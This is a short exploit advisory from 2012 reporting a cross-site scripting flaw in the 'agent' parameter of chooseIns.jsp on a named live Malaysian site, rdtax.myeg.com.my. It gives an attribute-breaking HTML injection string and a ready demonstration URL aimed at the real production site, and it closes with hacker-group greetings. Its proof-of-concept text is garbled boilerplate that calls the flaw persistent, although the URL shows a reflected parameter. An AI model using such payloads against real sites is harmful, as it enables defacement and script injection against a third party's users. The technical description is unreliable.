rdtax.myeg.com.my suffers from a cross site scripting vulnerability.
c2fc1cd70037cca8df2b3733c820778cf56f07e5af2d9f51862f9ebb904b6e77
##################################################
# Exploit Title: rdtax.myeg.com.my XSS Vulnerability
# Date: 27/07/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# Security:RISK: normal
# Vendor or Software Link:
# Google dork: -
# Tested on: Linux
##################################################
[~]Exploit/p0c :
http://localhost:80/[path]/[path]/chooseIns.jsp?agent=
[~]Proof of Concept:
1.1
he issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strings: /"><h3><blink>#bug by Ryuzaki n Xl4n</blink></h3>
[~]Dem0 :
https://rdtax.myeg.com.my/RHBI/chooseIns.jsp?agent=/"><h3><blink>bug by Ryuzaki n Xl4n</blink></h3>
FB : www.fb.me/justryuz
+---------------------------------------------------+
Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+